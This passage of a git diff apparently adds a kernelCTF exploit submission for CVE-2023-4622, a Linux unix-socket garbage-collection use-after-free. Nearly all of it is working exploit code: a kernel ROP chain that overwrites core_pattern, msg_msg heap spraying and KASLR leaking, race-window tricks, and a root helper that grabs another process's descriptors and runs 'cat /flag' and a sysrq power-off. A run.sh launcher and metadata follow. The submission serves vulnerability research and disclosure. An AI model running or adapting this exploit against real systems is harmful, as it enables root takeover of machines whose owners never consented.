POP_RSI (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; ret +#define POP_RSI2 (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret +#define POP_RDX (KERNEL_BASE + (0x00fc7352 - STATIC_KBASE)) // pop rdx ; ret +#define POP_RSP (KERNEL_BASE + (0x00fd3ea6 - STATIC_KBASE)) // pop rsp ; ret +#define PIVOT (KERNEL_BASE + (0x008a9428 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x39] +#define PIVOT2 (KERNEL_BASE + (0x0008160e - STATIC_KBASE)) // pop rsp ; pop r15 ; ret +#define PIVOT3 (KERNEL_BASE + (0 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x2e] +#define CORE_PATTERN (KERNEL_BASE + (0x239e4a0 - STATIC_KBASE)) +#define COPY_FROM_USER (KERNEL_BASE + (0x7855f0 - STATIC_KBASE)) +#define MSLEEP (KERNEL_BASE + (0x16c1c0 - STATIC_KBASE)) +#define ANON_PIPE_BUF_OPS_OFF (0x17cae40 - STATIC_KBASE) +#endif + +char user_buf[] = "|/proc/%P/fd/666"; +#define ROP(idx) ((size_t *)rop)[(idx) + (START_ROP / 8)] +int build_fake_pipe_buffer_with_rop_chain(size_t rop_addr, char *rop) +{ + *(size_t *)&rop[0x8] = POP_RDI; + *(size_t *)&rop[0x18] = POP_RSP; + *(size_t *)&rop[0x20] = rop_addr + START_ROP; + +#ifdef LTS + *(size_t*)&rop[0x10] = rop_addr+0x30; //set pipe_buffer.ops + *(size_t*)&rop[0x38] = PIVOT3; //set pipe_buf_operations.release + *(size_t*)&rop[0x2e] = PIVOT2; +#else + *(size_t *)&rop[0x10] = rop_addr + 0x20; //set pipe_buffer.ops + *(size_t *)&rop[0x28] = PIVOT; //set pipe_buf_operations.release + *(size_t *)&rop[0x39] = PIVOT2; +#endif + + int i = 0; + // copy_from_user(core_pattern, user_buf, sizeof(user_buf); + ROP(i++) = POP_RDI; + ROP(i++) = CORE_PATTERN; + ROP(i++) = POP_RSI2; + ROP(i++) = (size_t)&user_buf; + ROP(i++) = POP_RDX; + ROP(i++) = sizeof(user_buf); + ROP(i++) = COPY_FROM_USER; + // msleep(0x10000); + ROP(i++) = POP_RDI; + ROP(i++) = 0x10000; + ROP(i++) = MSLEEP; +} + +int corrupted_msg() +{ + int corrupted_q = 0; + int corrupted_type = 0; + int victim_q, victim_type = 0; + for (int i = 0; i < NUM_QUEUE; i++) 
+ { + int tmp_mtype = 0; + for (int j = 0; j < NUM_MSG; j++) + { + if (msgrcv(msqid[i], &msg, MSG_SIZE, j, MSG_COPY | IPC_NOWAIT) < 0) + { + break; + } + // check if msg is corrupted + if (msg.mtype - 1 != tmp_mtype || *(size_t *)&msg.mtext[0] != i) + { + corrupted_q = i; // corrupted msg queue + corrupted_type = tmp_mtype; // corrupted msg index/type identifier + victim_q = *(size_t *)&msg.mtext[0]; // victim msg queue + victim_type = msg.mtype; // victim msg index/type identifier + // Now we have `msqid[corrupted_q]` with mtype corrupted_type point the same msg + // at msqid[victim_q] with mtype `victim_type` + goto done; + } + tmp_mtype = msg.mtype; + } + } +done: + if (corrupted_type) + { + printf("corrupted_q: %d\n", corrupted_q); + printf("corrupted_type: %d\n", corrupted_type); + printf("victim_q: %d\n", victim_q); + printf("victim_type: %d\n", victim_type); + // delete msg at victim_q with mtype victim_type + msgrcv(msqid[victim_q], &msg, MSG_SIZE, victim_type, IPC_NOWAIT); // this deleted msg can still accessed by corrupted_q with corrupted_type (msg UAF) + + // prepare corrupted msg_msg + ((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future) + ((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type + ((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x200; // fake msg.m_ts (for leak kernel address via buffer overread) + ((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next + ((size_t *)&msg.mtext[0x1000 - 0x30])[4] = 0; // msg.security + + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + ((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j; + msg.mtype = 1; + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg + msg.mtype = 2; + SYSCHK(msgsnd(hackq[j], &msg, 0x200, 0)); // send rop payload here later [1] + } + // msgrcv on corrupted msg for leaking what msg adjacent with this corrupted msg + SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | 
IPC_NOWAIT)); + int victim2_q = *(size_t *)&msg.mtext[0x80]; + int victim2_type = *(size_t *)&msg.mtext[0x60]; + printf("victim2_q: %d\n", victim2_q); // adjacent corrupted msg queue identifier + printf("victim2_type: %d\n", victim2_type); // adjacent corrupted msg m_type identifier + msgrcv(msqid[victim2_q], &msg, MSG_SIZE, victim2_type, IPC_NOWAIT); // free the adjacent msg + + // reallocate adjacent msg with another msg that contain kmalloc-1024 heap address + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + msg.mtype = 3; + *(size_t *)&msg.mtext[0] = j; + SYSCHK(msgsnd(hackq[j], &msg, MSG_SIZE, 0)); // replace the adjacent msg + msg.mtype = 4; + SYSCHK(msgsnd(hackq[j], &msg, 0x400 - 0x30, 0)); // fill adjacent msg.next with kmalloc-1024 + } + + // msgrcv on corrupted msg for leaking known heap address + // msg.prev is prepared rop memory allocated at [1] + // msg.next is another heap memory that will be replaced with pipe_buffer later + SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x200, corrupted_type, MSG_COPY | IPC_NOWAIT)); + size_t known_addr_pipe = *(size_t *)&msg.mtext[0x50]; // adjacent msg msg.m_prev + size_t known_addr_rop = *(size_t *)&msg.mtext[0x58]; // adjacent msg msg.m_next + int victim3_q = *(size_t *)&msg.mtext[0x80]; // get msg queue identifier from adjacent msg + int victim4_q = *(size_t *)&msg.mtext[0x0]; // get msg queue identifier from msg + printf("known_addr_rop 0x%lx\n", known_addr_rop); // rop payload address + printf("known_addr_pipe 0x%lx\n", known_addr_pipe); // pipe_buffer address + printf("victim3_q: %d\n", victim3_q); + printf("victim4_q: %d\n", victim4_q); + // delete msg that will replaced with pipe_buffer + SYSCHK(msgrcv(hackq[victim3_q], &msg, 0x400 - 0x30, 4, IPC_NOWAIT)); + // replace the deleted msg with pipe_buffer + for (int i = 0; i < 0xf0; i++) + { + //printf("%p\n",i); + SYSCHK(pipe(spray_pipe2[i])); + SYSCHK(write(spray_pipe2[i][1], "pwn", 3)); + } + + // delete the msg (that used to build fake msg) + 
SYSCHK(msgrcv(hackq[victim4_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 1, IPC_NOWAIT)); + + // prepare for the second fake msg + ((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISON2 (bypass list_del in the future) + ((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type + ((size_t *)&msg.mtext[0x1000 - 0x30])[2] = 0x1000 - 0x30 + 0x400 - 0x8; // fake msg.m_ts + ((size_t *)&msg.mtext[0x1000 - 0x30])[3] = known_addr_pipe - 0x10; // fake msg.next for leak anon_pipe_buf_ops + + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + ((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j; + msg.mtype = 5; + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 0)); // spray fake msg + } + + // receive corrupted msg + SYSCHK(msgrcv(msqid[corrupted_q], &msg, 0x1000 - 0x30 + 0x400 - 0x8, corrupted_type, MSG_COPY | IPC_NOWAIT)); + int victim5_q = *(size_t *)&msg.mtext[0x0]; // msg queue identifier + printf("victim5_q: %d\n", victim5_q); + size_t anon_pipe_buf = *(size_t *)&msg.mtext[0x1000 - 0x30 + 0x20 - 8]; // anon_pipe_buf_ops address + printf("anon_pipe_buf 0x%lx\n", anon_pipe_buf); + KERNEL_BASE = anon_pipe_buf - ANON_PIPE_BUF_OPS_OFF; // leak kernel base + printf("fixing kernel base to 0x%lx\n", KERNEL_BASE); + + // delete the corrupted msg that contain fake msg data for rebuild another fake msg + SYSCHK(msgrcv(hackq[victim5_q], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT)); + + // rebuild fake msg + ((size_t *)&msg.mtext[0x1000 - 0x30])[0] = 0xdead000000000122; // LIST_POISION2 + ((size_t *)&msg.mtext[0x1000 - 0x30])[1] = 0x1337; // fake msg.m_type + ((size_t *)&msg.mtext[0x1000 - 0x30])[2] = MSG_SIZE; // fake msg.m_ts + ((size_t *)&msg.mtext[0x1000 - 0x30])[3] = 0; // msg.next + ((size_t *)&msg.mtext[0x1000 - 0x30])[4] = known_addr_pipe; // fake msg.security (for arbitrary free on pipe_buffer) + + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + ((size_t *)&msg.mtext[0x1000 - 0x30])[5] = j; + msg.mtype = 1; + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 
0x30 + 0x80 - 8, 0)); // overwrite stale msg with fake msg + } + + // free up the msg quota + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + if (j != victim5_q) // make sure we didn't mess up with the corrupted queue + SYSCHK(msgrcv(hackq[j], &msg, 0x1000 - 0x30 + 0x80 - 8, 5, IPC_NOWAIT)); + } + + // delete the fake msg, this will perform arbitrary free on pipe_buffer + SYSCHK(msgrcv(msqid[corrupted_q], &msg, MSG_SIZE, 0x1337, IPC_NOWAIT)); + + // prepare fake pipe_buffer and rop payload + msg.mtype = 6; + build_fake_pipe_buffer_with_rop_chain(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]); + for (int j = 0; j < NUM_QUEUE_RESV; j++) + { + // overwrite pipe_buffer + SYSCHK(msgsnd(hackq[j], &msg, 0x1000 - 0x30 + 0x400 - 8, IPC_NOWAIT)); + } + + // trigger RIP control + for (int i = 0; i < 0xf0; i++) + { + close(spray_pipe2[i][0]); + close(spray_pipe2[i][1]); + } + + return 1; + } + return 0; +} + +void set_cpu(int i); + +void *trigger_unix_stream_sendpage(void *x) +{ + set_cpu(0); + // setup a certain timeout nanosecond + struct itimerspec new = {.it_value.tv_nsec = timeout}; + // Send signal to trigger_unix_gc_thread + write(sync_job[1], "H", 1); + SYSCHK(timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL)); + splice(datapipe[0], 0, A, 0, 0x1000, 0); + close(datapipe[0]); + return NULL; +} + +void *trigger_unix_gc_thread(void *x) +{ + set_cpu(1); + int s = socket(AF_UNIX, SOCK_STREAM, 0); + read(sync_job[0], &x, 1); + // Release a unix socket will trigger unix_gc + close(s); + return NULL; +} + +void *spray_pipe_page_thread(void *x) +{ + set_cpu(1); + // After unix_gc clean skb, this thread will wakeup and start spray pipe page. 
+ read(signalpipe[0], buf, 1); + for (int i = 0; i < 0x100; i++) + for (int j = 0; j < 0x10; j++) + write(spray_pipe[i][1], spray_data, 0x1000); + + return NULL; +} + +static void epoll_ctl_add(int epfd, int fd, uint32_t events) +{ + struct epoll_event ev; + ev.events = events; + ev.data.fd = fd; + SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)); +} + +void set_cpu(int i) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void do_epoll_enqueue(int fd) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < 0x4; k++) + { + if (fork() == 0) + { + for (int i = 0; i < 0x100; i++) + { + timefds[i] = SYSCHK(dup(fd)); + } + for (int i = 0; i < 0xc0; i++) + { + epfds[i] = SYSCHK(epoll_create(0x1)); + } + for (int i = 0; i < 0xc0; i++) + { + for (int j = 0; j < 0x100; j++) + { + // queue as many as possible async waiters at timerfd waitqueue + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); // stop here for nothing and just keep epoll alive + } + // sync to make sure it has queue what we need + read(cfd[0], buf, 1); + } + close(cfd[0]); + close(cfd[1]); +} + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + *(size_t *)0 = 0; +} + +int main(int argc, char **argv) +{ + size_t start_time = time(NULL); + setvbuf(stdout, 0, 2, 0); + //leak(); + printf("POP_RDI @ 0x%lx\n", POP_RDI); + printf("POP_RDX @ 0x%lx\n", POP_RDX); + printf("POP_RSI @ 0x%lx\n", POP_RSI); + printf("POP_RSP @ 0x%lx\n", POP_RSP); + printf("POP_RSI2 @ 0x%lx\n", 
POP_RSI2); + printf("PIVOT @ 0x%lx\n", PIVOT); + printf("PIVOT2 @ 0x%lx\n", PIVOT2); + printf("PIVOT3 @ 0x%lx\n", PIVOT3); + signal(SIGPIPE, SIG_IGN); + + if (fork() == 0) + { + set_cpu(1); + strcpy(argv[0], "billy"); + while (1) + sleep(1); + } + if (fork() == 0) + { + set_cpu(1); + setsid(); + crash(""); + } + + struct rlimit rlim = { + .rlim_cur = 0xf000, + .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + // init a timerfd for extend the race windows + tfd = timerfd_create(CLOCK_MONOTONIC, 0); + // Do extend race windows stuff + do_epoll_enqueue(tfd); + pipe(sync_job); + setup_msg(); + printf("setup head to 0x%lx\n", PHYS_ADDR_MSG); + // Prepare spray data for reallocate freed skb as pipe page data. + // Craft skb->head and skb->end to control skb_shinfo pointer + for (int i = 0; i < 0x10; i++) + { + *(size_t *)&spray_data[i * 0x100 + 0xc0] = PHYS_ADDR_MSG; // skb->head + *(int *)&spray_data[i * 0x100 + 0xbc] = 0x42; // skb->end + } + + for (int i = 0; i < 0x100; i++) + SYSCHK(pipe(spray_pipe[i])); + + // prepare a template msg for send unix socket to peer + struct msghdr msg = {}; + struct iovec iov[] = {{.iov_base = data, .iov_len = 5}}; + msg.msg_iov = iov; + msg.msg_iovlen = 1; + struct cmsghdr *cmsg; + int len = CMSG_LEN(sizeof(int)); + cmsg = (struct cmsghdr *)calloc(0x10, len); // prepare larger enough chunck + cmsg->cmsg_len = len; + cmsg->cmsg_level = SOL_SOCKET; + cmsg->cmsg_type = SCM_RIGHTS; + msg.msg_control = cmsg; + msg.msg_controllen = len; + set_cpu(1); + + if (fork() == 0) + { + while (1) + { + // Try every different timeout seconds for timerfd to expire. + // Hope it will hit our ideal scenario in thousands of tries + if ((timeout & 0xff) == 0) + { + printf("0x%lx\n", timeout); + // We check msg_msg->m_list->next is modified due to our UAF write every 0x100 tries + if (corrupted_msg()) + break; + } + // rollback to smallest timeout to make timeout always in short time. 
+ if ((timeout & 0xfff) == 0) + { + timeout = 200; + if( (time(NULL)-start_time)>(30*60) ) + exit(-1); + } + timeout++; + + // prepare a signal like pipe and make spray_pipe_page_thread read on it + // When peer pipe has be closed by unix_gc, spray_pipe_page_thread will wake up and start spray + pipe(signalpipe); + pthread_t spray_thread; + pthread_create(&spray_thread, 0, spray_pipe_page_thread, 0); + + // prepare a data pipe for us to call unix_stream_sendpage only. + pipe(datapipe); + write(datapipe[1], data, 0x1000); + + // Prepare unix socket refcount circle + // A <-> B + // C <-> D + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + A = fds[0]; + B = fds[1]; + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + C = fds[0]; + D = fds[1]; + + // Max the socket send/recv buffer, because we need to spray a certain number skb + // For heap cross cache attack + size_t val = 0x400000; + SYSCHK(SYSCHK(setsockopt(D, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(A, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(B, SOL_SOCKET, SO_RCVBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(C, SOL_SOCKET, SO_RCVBUF, &val, 4))); + + // Spray a lot skb a head for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // Make B's recv buffer hold C, datapipe and signalpipe refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int) * 3); + msg.msg_controllen = cmsg->cmsg_len; + ((int *)CMSG_DATA(cmsg))[0] = signalpipe[1]; //when release this file, spray_pipe_page_thread will wake up when CPU#1 has free cpu time. 
+ ((int *)CMSG_DATA(cmsg))[1] = datapipe[1]; // when release this file, because pipe lock is hold in splice, it will sleep and let CPU#1 to context switch + ((int *)CMSG_DATA(cmsg))[2] = C; + SYSCHK(sendmsg(A, &msg, 0)); + + // decrease unnecessary refcount + close(signalpipe[1]); + close(datapipe[1]); + + // Make C's recv buffer hold B refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int)); + msg.msg_controllen = cmsg->cmsg_len; + *(int *)CMSG_DATA(cmsg) = B; + SYSCHK(sendmsg(D, &msg, 0)); + + // Spray a lot skb at tail for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // decrease unnecessary refcount + close(B); + close(C); + + // A real round for race + pthread_t tid[2]; + pthread_create(&tid[1], NULL, trigger_unix_gc_thread, NULL); + pthread_create(&tid[0], NULL, trigger_unix_stream_sendpage, NULL); + pthread_join(tid[1], NULL); + pthread_join(tid[0], NULL); + pthread_join(spray_thread, NULL); + + // Release pipe page for next round + for (int i = 0; i < 0x100; i++) + for (int j = 0; j < 0x10; j++) + read(spray_pipe[i][0], buf, 0x1000); + + // Cleanup for next round + close(A); + close(D); + close(signalpipe[0]); + } + exit(0); + } + wait(NULL); + // Never return after success + while (1) + sleep(1); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.tar.gz b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.tar.gz new file mode 100644 index 00000000..0a70b43d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root new file mode 100755 index 00000000..7f12d887 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root differ diff --git 
a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root.c b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root.c new file mode 100644 index 00000000..95476547 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/root.c @@ -0,0 +1,41 @@ + +#define _GNU_SOURCE /* See feature_test_macros(7) */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define SYS_pidfd_getfd 438 +char buf[0x100]; +char path[0x100]; +int res; +int fd; +int port; +char* ip; +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + sprintf(path,"/proc/%d/ns/net",pid); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + system("cat /flag;echo o>/proc/sysrq-trigger"); + + +} +int main(int argc,char** argv){ + job(0); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/run.sh b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/run.sh new file mode 100755 index 00000000..40937bd1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/run.sh @@ -0,0 +1,6 @@ +#!/bin/sh +dd if=$0 of=/tmp/exp.tar.gz skip=1 +cd /tmp +tar -xf exp.tar.gz +./poc +exit diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-4622_cos/metadata.json new file mode 100644 index 00000000..6d714afb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp95" + ], + "vulnerability":{ + 
"patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y&id=790c2f9d15b594350ae9bca7b236f2b1859de02c", + "cve":"CVE-2023-4622", + "affected_versions":[ + "4.2 - 6.4" + ], + "requirements":{ + "attack_surface":[ + + ], + "capabilities":[ + ], + "kernel_config":[ + "CONFIG_UNIX" + ] + } + }, + "exploits": { + "cos-105-17412.101.42": { + "uses":[ + ], + "requires_separate_kaslr_leak": true, + "stability_notes":"1 ~ 2 times success per 10 times run" + } + } + } diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-4622_cos/original.tar.gz new file mode 100644 index 00000000..d6585662 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/original.tar.gz differ